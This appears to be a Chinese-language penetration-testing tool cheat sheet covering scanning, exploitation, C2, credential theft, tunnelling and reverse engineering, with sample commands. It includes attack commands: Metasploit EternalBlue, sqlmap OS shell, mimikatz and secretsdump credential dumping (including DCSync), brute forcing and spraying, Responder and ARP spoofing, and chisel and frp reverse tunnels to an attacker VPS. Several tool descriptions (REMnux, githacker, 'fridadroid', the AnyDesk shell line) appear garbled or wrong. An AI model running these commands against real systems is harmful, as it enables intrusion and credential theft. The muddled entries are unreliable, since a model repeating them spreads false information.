TOC
工具总结
信息收集
nmap
最经典的主机发现与端口扫描工具,几乎是所有渗透测试的第一步。
# 基本扫描 nmap -sS -sV -p 1-65535 192.168.1.1 # 操作系统探测 + 脚本扫描 nmap -A -T4 192.168.1.1 # 内网存活发现 nmap -sn 192.168.1.0/24 # 导出 XML 给 Metasploit 使用 nmap -sS -sV -oX scan.xml 192.168.1.1
masscan
号称"互联网最快的端口扫描器",使用自定义 TCP/IP 协议栈,几分钟扫完整个互联网。适合大规模资产测绘。
# 扫描整个 C 段 masscan -p80,443,8080 192.168.1.0/24 --rate=10000 # 扫描常见端口并输出 masscan -p1-65535 192.168.1.1 --rate=1000 -oJ output.json
naabu
新一代端口扫描器,Go 语言编写,速度快且支持多种协议探测(TCP/UDP/TLS),适合配合自动化流水线使用。
# 全端口扫描 naabu -host 192.168.1.1 -p - # 从文件读取目标 naabu -list targets.txt -p 80,443,8080 # 输出给 httpx 使用 naabu -host 192.168.1.1 -json | httpx
httpx
HTTP 探测工具,用于快速识别 Web 服务,获取状态码、标题、技术栈等信息。
# 基础探测 httpx -l subdomains.txt -title -tech-detect -status-code # 带指纹识别 httpx -l targets.txt -favicon -hash sha256 -jarm # 截图保存 httpx -l targets.txt -screenshot -screenshot-dir ./screenshots
subfinder
子域名发现工具,利用被动源(证书透明度、搜索引擎、DNS 数据集等)快速收集子域名。
# 基础枚举 subfinder -d example.com # 输出给 httpx 验证存活 subfinder -d example.com -silent | httpx
ksubdomain
无状态子域名爆破工具,通过 DNS 解析验证子域名存活,速度极快。
# 基础爆破 ksubdomain enum -d example.com -f subnames.txt # 验证存活 ksubdomain verify -f subdomains.txt
gau
Get All URLs——从 AlienVault OTX、Wayback Machine、CommonCrawl 等源收集目标历史 URL。
# 收集所有已知 URL gau example.com # 去重后输出 gau example.com | sort -u > urls.txt # 配合 nuclei 检测漏洞 gau example.com | sort -u | nuclei
katana
新一代爬虫工具,Go 语言实现,支持单页应用(SPA)爬取,自动提取表单/参数/路径,非常适合配合被动扫描器使用。
# 基本爬取 katana -u https://example.com # 爬取并输出给 nuclei katana -u https://example.com -silent | nuclei
子域名接管
子域名接管检测。当 DNS 记录指向已失效的第三方服务(如未使用的云服务实例)时,攻击者可注册同名服务接管子域名。常用工具包括 subjack 和 can-i-take-over-xyz。
内网扫描与资产测绘
fscan
内网综合扫描工具,适合拿到入口后快速内网信息收集:存活探测、端口扫描、服务识别、MS17010 检测、Web 指纹一把梭。
# 扫描单个 IP 默认端口 fscan -h 192.168.1.1 # 扫描 C 段 fscan -h 192.168.1.0/24 # 组合拳:主机存活 + 全端口 + 漏洞扫描 fscan -h 192.168.1.0/24 -p 1-65535 -np
gogo
内网渗透扫描器,功能类似 fscan 但更注重扫描速度和插件化,适合大网段快速定位脆弱点。
# 默认扫描 gogo -i 192.168.1.0/24 # 指定端口和线程数 gogo -i 192.168.1.1 -p 1-65535 -t 1000
shodan / fofa / censys
网络空间测绘搜索引擎。Shodan 扫设备/Banner,Fofa 是国内同类产品检索域名/端口/Banner。攻击面管理中用于大规模资产探查。
漏洞扫描
nuclei
漏洞模板扫描引擎,基于 YAML 的 POC 模板,社区活跃,POC 库极其丰富(5000+ 模板)。
# 使用所有模板扫描 nuclei -u https://example.com -t nuclei-templates/ # 只扫描高危漏洞 nuclei -l targets.txt -s critical,high # 扫描特定 CVE nuclei -u https://example.com -t cves/2024/
xray
长亭科技出品的被动漏洞扫描器,社区版免费但功能强大。通过代理流量被动分析,支持 SQL 注入、命令注入、XSS、SSRF 等检测。
# 基础监听 xray webscan --listen 127.0.0.1:7777 # 配合浏览器使用,设置代理为 127.0.0.1:7777 即可
zap (Zed Attack Proxy)
OWASP 的免费 Web 安全扫描器,类似 Burp Suite 的主动扫描 + 被动扫描,自带爬虫、Ajax 蜘蛛、Fuzzer、WebSocket 测试。可作为自动化的 DAST 工具嵌入 CI/CD 流程。
awvs (Acunetix)
商业 Web 漏洞扫描器,自动爬取 + 深度扫描,检测 SQL 注入/XSS/SSRF/RCE 等。准确率较高,支持生成合规报告。附带盲注入验证(带外 DNS 追踪)。
nessus
商业漏洞扫描器,传统漏洞管理首选。内置 70000+ 插件,覆盖系统漏洞、配置合规、Web 安全、数据库安全等。
openvas (Greenbone)
开源漏洞扫描器,Nessus 的开源替代品,适合预算有限的团队。
Web 应用测试
burp suite
Web 安全测试的事实标准。Community 版免费,Professional 版支持全自动化扫描。核心功能:代理拦截、Repeater(请求重放)、Intruder(暴力测试)、Scanner(自动扫描)、Collaborator(外带检测)。
插件生态丰富,推荐:
- Autorize — 越权检测自动化
- Turbo Intruder — 高速并发暴力测试(HTTP 管道复用)
- Logger++ — 增强日志记录
- HaE — 高亮标记敏感信息
yakit
Yaklang 团队的 Web 安全测试平台,国内开发,类似 Burp Suite 但更贴合国人习惯,支持 MITM 交互式劫持、插件化扫描、模糊测试。
sqlmap
SQL 注入自动化利用工具,功能极其全面:自动检测、数据枚举、文件读写、命令执行、提权等。
# 基础检测 sqlmap -u "http://example.com/page.php?id=1" # 指定注入类型 sqlmap -u "http://example.com/page.php?id=1" --technique=BEUST # 枚举数据库 sqlmap -u "http://example.com/page.php?id=1" --dbs # 使用 POST 请求 sqlmap -r request.txt --os-shell # 过 WAF(tamper 脚本) sqlmap -u "http://example.com/page.php?id=1" --tamper=space2comment,charencode --random-agent
dirsearch
Web 目录/路径爆破工具,多线程请求 + 字典匹配来发现隐藏路径。
# 基本扫描 dirsearch -u https://example.com -e php,asp,aspx,jsp # 递归扫描 dirsearch -u https://example.com -r --deep-recursive # 使用自定义字典 dirsearch -u https://example.com -w /path/to/wordlist.txt
ffuzz
Go 语言编写的 Web Fuzz 工具,速度极快,不仅能爆破目录,还能 FUZZ 各种参数。
# 目录爆破
ffuf -u https://example.com/FUZZ -w wordlist.txt
# POST 参数 Fuzz
ffuf -u https://example.com/api -X POST -d '{"user":"FUZZ"}' -w wordlist.txt -H "Content-Type: application/json"
# 子域名枚举
ffuf -u http://FUZZ.example.com -w subdomains.txt
dalfox
参数化 XSS 扫描器,可自动在任何 URL 参数处注入 Payload 测试反射型 XSS。
# 单 URL 扫描 dalfox url https://example.com/?q=FUZZ # 批量扫描 cat urls.txt | dalfox pipe # 使用自定义 Payload dalfox url https://example.com/?q=FUZZ --user-payload payload.txt
dnslog / ysoSerial
DNSLog:DNS 带外数据收集平台。在盲注、SSRF、命令注入等无回显场景下通过 DNS 请求验证漏洞存在。
ysoserial:Java 反序列化漏洞利用 Payload 生成器,支持 30+ 利用链(CommonsCollections/Spring/Shiro 等)。
godnslog
Go 实现的自建 DNS/HTTP 外带日志系统。相比公共 DNSLog 平台更私密可控。
githacker
公开 GitHub 仓库信息泄露检测。自动搜寻仓库中泄露的密码/密钥/Token。
githacker --url https://github.com/xxx/repo --output-folder result/
漏洞利用
metasploit (MSF)
最知名的渗透测试框架,集漏洞扫描 + 漏洞利用 + 后渗透于一体。模块按用途分为 exploit、auxiliary、post、payload 等。
# 启动控制台 msfconsole # 搜索模块 search smb # 使用 exploit use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.1 run # 批量扫描漏洞 use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.1.0/24 run
C2 框架
cobalt strike
商业 C2 框架,红队行动标配。Beacon 模式支持 HTTP/HTTPS/DNS/SMB 等多种通信协议。主要功能:会话管理、横向移动、凭据提取、权限持久化、免杀生成。
非开源商业软件,需购买 License。
sliver
BishopFox 开源的 C2 框架,多协议支持(MTLS、WG、HTTP(S)、DNS),多平台 Implant 生成(Windows/Linux/macOS),内置丰富的红队工具链。免费且持续更新。
mythic
开源 C2 框架,Docker 部署、Web UI 管理、跨平台 Agent。可安装第三方 Agent 扩展,支持 HTTP、WebSocket 等通信方式,界面友好。
内网渗透与域安全
impacket
Python 实现的 Windows 网络协议工具包,处理 SMB/MSRPC/SAMR/Netlogon 等协议。常用于:凭据提取(secretsdump)、横向移动(wmiexec/psexec/smbexec)、Kerberos 攻击等。
# 导出 SAM secretsdump.py administrator:Password@192.168.1.1 # 远程执行命令 wmiexec.py administrator:Password@192.168.1.1 # DCSync 攻击 secretsdump.py domain/admin:Pass@192.168.1.1 -just-dc-user krbtgt
nxc (netExec)
新一代网络服务利用工具,是 CrackMapExec 的继任者。支持 SMB/SSH/WinRM/RDP/LDAP 等多协议,凭据喷洒、命令执行、信息枚举一条龙。
# SMB 存活扫描 nxc smb 192.168.1.0/24 # 凭据喷洒 nxc smb 192.168.1.0/24 -u administrator -p Password123 # 执行命令 nxc smb 192.168.1.0/24 -u admin -p 'Pass' -x 'whoami'
responder
LLMNR/NBT-NS/mDNS 欺骗工具,内网渗透必备。通过监听并欺骗名称解析请求来捕获 Net-NTLM 哈希。
# 基础监听 responder -I eth0 # 仅监听不做攻击 responder -I eth0 -A # 捕获后使用 hashcat 破解 hashcat -m 5600 hash.txt /path/to/wordlist
bloodhound
AD 域关系图分析工具,通过图数据库分析域内权限关系,可视化攻击路径。SharpHound 收集数据 → BloodHound 分析展示。
SharpHound 收集器:
# Windows 上收集 SharpHound.exe -c All
分析结果可直观看到从当前权限到域管理员的攻击路径。
mimikatz
凭据提取神器,从 Windows 内存中提取密码哈希、明文密码、PIN 码、Kerberos 票据。内网渗透最重要的工具之一。
# 提取所有凭据 mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" # 导出票据 mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" # DCSync 模拟 mimikatz.exe "lsadump::dcsync /user:krbtgt"
evil-winrm
Windows 远程管理(WinRM)连接工具,比普通 WinRM 更好用(文件上传/内存加载等)。
evil-winrm -i 192.168.1.1 -u administrator -p 'Password'
密码攻击
hydra
在线密码暴力破解工具,支持 50+ 协议(SSH/FTP/HTTP/RDP/MySQL 等)。
# SSH 爆破 hydra -l root -P pass.txt ssh://192.168.1.1 # HTTP POST 表单爆破 hydra -l admin -P pass.txt 192.168.1.1 http-post-form "/login.php:user=^USER^&pass=^PASS^:Login failed" # 多线程 HTTP 爆破 hydra -L users.txt -P pass.txt 192.168.1.1 http-get
john the ripper
老牌密码破解工具,支持几乎所有哈希格式。CPU 模式破解,配合规则集效率高。
# 自动检测哈希类型 john hash.txt # 指定格式破解 john --format=NT hash.txt --wordlist=rockyou.txt # 显示已破解结果 john --show hash.txt
hashcat
GPU 加速密码破解,速度远超 John。支持 300+ 哈希类型,充分利用显卡并行计算。
# NTLM 哈希破解 hashcat -m 1000 hash.txt rockyou.txt # Net-NTLMv2 破解 hashcat -m 5600 hash.txt rockyou.txt # 掩码攻击(8 位数字) hashcat -m 1000 hash.txt -a 3 ?d?d?d?d?d?d?d?d
代理与隧道
proxifier / proxychains
代理链工具。Proxifier 是 GUI 应用,强制指定程序走代理;Proxychains 是 Linux 命令行工具,Hook 网络函数实现进程级别的代理转发。
# proxychains 配置 /etc/proxychains4.conf 后 proxychains4 nmap -sT -Pn 10.0.0.1 proxychains4 msfconsole
frp
反向代理/内网穿透工具。客户端 frpc 映射端口到 frps。
# frpc.ini [common] server_addr = your_vps_ip server_port = 7000 [ssh] type = tcp local_ip = 127.0.0.1 local_port = 22 remote_port = 6000
cloudflare tunnel (Argo)
利用 Cloudflare CDN 建立隧道(cloudflared),隐藏真实服务器 IP。同样用途:NPS(轻量内网穿透服务端/客户端模式)。
iox
Go 语言端口转发工具,支持 TCP、UDP 级端口转发,适合多层内网代理场景。
chisel
Go 实现的快速 TCP/UDP 隧道,HTTP 传输,适合受限环境下的反向端口转发。
# 服务端 chisel server -p 8080 --reverse # 客户端(反向代理内网端口到服务端) chisel client vps:8080 R:1080:socks
shadowsocks / v2ray / clash
代理工具,渗透测试中常用于隐藏 C2 流量(Nginx 前置伪装)、代理池轮换扫描源 IP。
网络分析
wireshark
网络协议分析器,抓包/过滤/解码/统计一把抓。渗透测试中常用于:流量劫持分析、明文密码捕获、协议逆向。支持 3000+ 协议解析。
过滤语法:http.request.method == "POST"、ip.src == 192.168.1.1、tcp.port == 4444。
tcpdump
命令行网络抓包工具,Linux 标配。适合无图形界面的服务器环境。
# 抓取指定接口流量 tcpdump -i eth0 -w capture.pcap # 过滤 HTTP 流量 tcpdump -i eth0 port 80 # 实时查看包内容 tcpdump -i eth0 -A port 80
bettercap
模块化 MITM 框架,WiFi 嗅探、蓝牙探测、密码学混淆识别、DNS 欺骗、HTTP/HTTPS 透明代理等。Go 语言 + Web UI。
# HTTP/HTTPS 代理 bettercap -eval "set arp.spoof.targets 192.168.1.100; arp.spoof on; net.sniff on" # WiFi 扫描 bettercap -eval "wifi.recon on"
aircrack-ng
WiFi 安全测试套件:airmon-ng(开启监听模式)、airodump-ng(抓包)、aireplay-ng(注入攻击)、aircrack-ng(破解密钥)。
charles / fiddler
HTTP/HTTPS 抓包调试代理工具(GUI)。Charles 支持 Map Local/Remote(请求改写)、断点修改、SSL 代理;Fiddler 支持脚本扩展。两者都适合移动端抓包。
提权
linpeas / winPEAS
Linux/Windows 提权信息收集脚本(Privilege Escalation Awesome Scripts),自动检查系统配置、服务权限、SUID 文件、计划任务等潜在提权点。
# Linux 端 ./linpeas.sh | tee linpeas_report.txt
Powershell 端直接运行 Invoke-PEAS.ps1。
GTFOBins / LOLBAS
- GTFOBins:Unix 二进制文件的"合法滥用"——列出可通过常见系统命令进行提权、文件读写、反弹 Shell 的方法。
- LOLBAS:与 GTFOBins 对应,Windows 版的 Living-off-the-land Binaries 清单。
两个都是在线查询网站,不是下载工具。
pkexec (PwnKit)
利用 Polkit 的 pkexec 权限提升漏洞(CVE-2021-4034),影响绝大多数 Linux 发行版。
# 确认有漏洞后 ./PwnKit
linux-exploit-suggester
Linux 内核提权建议脚本,根据内核版本匹配已知本地提权 Exploit。
./linux-exploit-suggester.sh
逆向工程
ida pro
交互式反汇编器,逆向工程事实标准。功能极其强大:Hex-Rays 反编译器(F5 生成伪代码)、Python/IDC 脚本、远程调试、固件分析。付费专业版 + MIPS/ARM 等架构渲染。
常用插件:Findcrypt(识别加密常量)、Keypatch(修补二进制)、Ponce(符号执行污点分析)、D810(反混淆)。
ghidra
NSA 开源的逆向框架,Java 实现跨平台。内置反编译器、反汇编、变体搜索。免费替代 IDA 的首选。
x64dbg / ollydbg
Windows 平台动态调试器。x64dbg 支持 32/64 位程序,OllyDbg 面向 32 位。功能:断点、内存修改、汇编补丁、跟踪分析。ScyllaHide 插件用于绕过反调试。
gdb + peda / pwndbg / gef
Linux 平台调试"全家桶"。GDB 是 GNU 调试器;PEDA/Pwndbg/GEF 为 Python 扩展,专为 PWN 和逆向优化,显示寄存器/堆栈/glibc 信息。
gdb ./binary # Pwndbg 插件下常用命令 b *main # 断点 r # 运行 vmmap # 显示内存映射 heap # 分析堆结构
radare2
开源逆向框架,命令行操作,功能强大。包含分析/反汇编/调试/十六进制编辑/二进制补丁,适合自动化逆向流水线。
die (Detect It Easy)
文件类型检测器,识别编译器/打包器/加密器/保护壳,逆向工程第一步。远超 PEiD。
upx / pe-bear
UPX:开源可执行文件压缩壳(加壳/脱壳),常用于减小体积或增加分析难度。PE-bear:PE 文件结构查看器,深度查看 PE 头/节表/导入导出表。
ollyDumpEx / scylla
转储 + 重建导入表的工具,配合 OllyDbg/x64dbg 手动脱壳使用。Scylla 是 ImpREC 的现代替代品。
二进制安全与 PWN
pwntools
Python 库,CTF PWN 题的主力工具。封装了远程连接、数据处理、ROP 链构建、Shellcode 生成、格式化字符串利用等功能。
from pwn import *
p = remote('challenge.example.com', 1337)
p.sendlineafter(b'name:', b'admin')
p.interactive()
checkmate / angr
Checkmate:Ghidra 插件,通过符号执行定位 Python 原生类调用从而实现混合语言分析。Angr:Python 符号执行框架,自动求解约束条件,常用于 CTF 自动化解题(符号执行找输入绕过验证)。
恶意软件分析
procmon / procexp / autoruns (Sysinternals)
Windows 系统调试工具集。ProcMon 监控进程/线程/注册表/文件系统事件;ProcExp 进程管理器可定位句柄/DLL 注入;Autoruns 分析所有自启动项(配合 VirusTotal 扫描)。
yara
恶意软件识别/分类规则引擎。根据二进制或文本模式写规则,匹配已知恶意软件特征。每篇 APT 分析报告中几乎都有 YARA 规则。
取证分析
volatility
内存取证框架,分析内存转储(.vmem/.raw/.dmp),提取进程列表、网络连接、注册表、恶意代码注入点、明文凭据等。
# 识别镜像配置文件 volatility -f memory.dmp imageinfo # 列出进程 volatility -f memory.dmp --profile=Win7SP1x64 pslist # 提取文件 volatility -f memory.dmp --profile=Win7SP1x64 filescan
autopsy / sleuth kit
Autopsy 是磁盘取证平台(GUI),基于 Sleuth Kit(命令行工具集)。用于分析磁盘镜像、恢复删除文件、提取时间线、分析文件系统元数据。
移动安全
easyre / apkIDE
EasyRE:Android 应用逆向工具包,集成 APK 解包/反编译/签名/重打包/安装。APKIDE:类似工具,可视化查看 DEX/Smali/Java 源码。
jadx / jeb
JADX — 开源 Android/Java 反编译器,DEX → Java 源码。JEB — 商业反编译器(支持 ARM/Android/Dalvik),拥有强大的本地反编译器和可视化 API。
fridadroid / mobSF
Frida + Droid:Frida Hook 框架在 Android 上的 Port/Fork(注入运行中的应用进行动态分析和修改)。MobSF:移动应用安全测试框架,支持静态/动态分析 Android/iOS 应用,自动检测漏洞。
渗透测试环境
kali linux
渗透测试标杆发行版,预装 600+ 安全工具,涵盖信息收集、漏洞评估、漏洞利用、逆向工程、取证等。
archlinux / blackarch
BlackArch 是 Arch Linux 的渗透测试发行版(2800+ 工具),适合喜欢滚动更新的安全研究者。
commando VM
Windows 渗透测试虚拟机,FireEye/Mandiant 出品。基于 Windows + Chocolatey 自动安装全套安全工具:Burp、Nmap、Metasploit、Cobalt Strike、Sysinternals 等。适合需要 Windows 原生工具链的场景。
remnux
Windows 恶意软件分析虚拟机,预装了反汇编器/调试器/行为监控/网络分析等全套 Malware Analysis 工具。与 Commando VM 属同一团队出品。
其他工具
anydesk / teamviewer(概念)
远控软件的"杀软特征",已被各大安全方案严密监控。攻击者常用远控软件建立持久化通道:使用白+黑手段通过 AnyDesk 的 Syscall 反弹 Shell,或替换合法的 TeamViewer 凭据接入。
cyberedge(赛博丽刃)
绿盟科技出品的红队模拟与评估平台,集成反病毒规避/权限提升/持久化/横向移动等模块。国内商业竞品。
常用在线工具集
密码破解在线查询:CrackStation、Cmd5、Somd5。子域名/证书信息:crt.sh、SecurityTrails、VirusTotal。Shellcode 转换生成器:shell-storm.org。加密解密:CyberChef(堪称网安瑞士军刀)。

评论区